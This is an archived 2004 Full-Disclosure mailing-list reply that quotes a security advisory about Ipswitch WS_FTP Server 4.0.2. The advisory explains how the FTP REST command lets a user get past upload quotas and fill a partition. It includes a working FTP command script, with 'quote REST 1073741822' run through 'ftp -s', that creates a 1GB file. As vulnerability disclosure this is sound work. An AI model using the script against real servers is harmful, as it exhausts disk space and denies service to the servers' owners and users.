| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 24 Mar 2004 00:19:49 +0100 From: exon <exon@...e.se> To: Hugh Mann <hughmann@...mail.com> Cc: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com, info@...witch.com, secure@...witch.com Subject: Re: How to crash a harddisk - the Ipswitch WS_FTP Server way This is old news. It is also RFC compliant behaviour, even though admitted silly. /exon Hugh Mann wrote: > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > Advisory Name: How to crash a harddisk - the Ipswitch WS_FTP Server way > Impact : Denial of Service > Discovered by: Hugh Mann hughmann@...mail.com > Tested progs : Ipswitch WS_FTP Server 4.0.2.EVAL > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > > Description > ~~~~~~~~~~~ > It's possible for any user with write access to a directory, even when > there's a limit to how much data the user can upload, to use up all > available disk space on any partition it can upload to. Even a slow > modem user can do this because the user only needs to send a few bytes > to the server. > > Details > ~~~~~~~ > The REST command is used to change the file pointer where new data > will be written to the file next time the user sends an upload command > such as STOR. A user can create arbitrary sized files (up to 2^64-1 > bytes) by specifying a large value as the argument to REST and then > sending a small file with STOR. > > WS_FTP Server doesn't count the extra bytes starting from the end of > the original file to the new file pointer location when checking if > the user can upload more bytes. The next time the user tries to upload > a file, WS_FTP Server will give an error. > > Exploit > ~~~~~~~ > Save this in a file called ftpcmds.txt, after changing the FTP server > name, username, and password. > > <<<<<<<<<<<< > open ftp.server.mob > username > password > !echo.>2byte.txt > !echo.>2byte_2.txt > dir > put 2byte_2.txt > dir > del 2byte_2.txt > quote REST 1073741822 > put 2byte.txt > dir > put 2byte_2.txt > del 2byte.txt > del 2byte_2.txt > !del 2byte.txt > !del 2byte_2.txt > quit > >>>>>>>>>>>>> > > Then start it: > > C:\>ftp -s:ftpcmds.txt > > to see the result. It will create a 1GB file and then delete it. > > _________________________________________________________________ > Is your PC infected? Get a FREE online computer virus scan from > McAfee® Security. > http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963 > > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists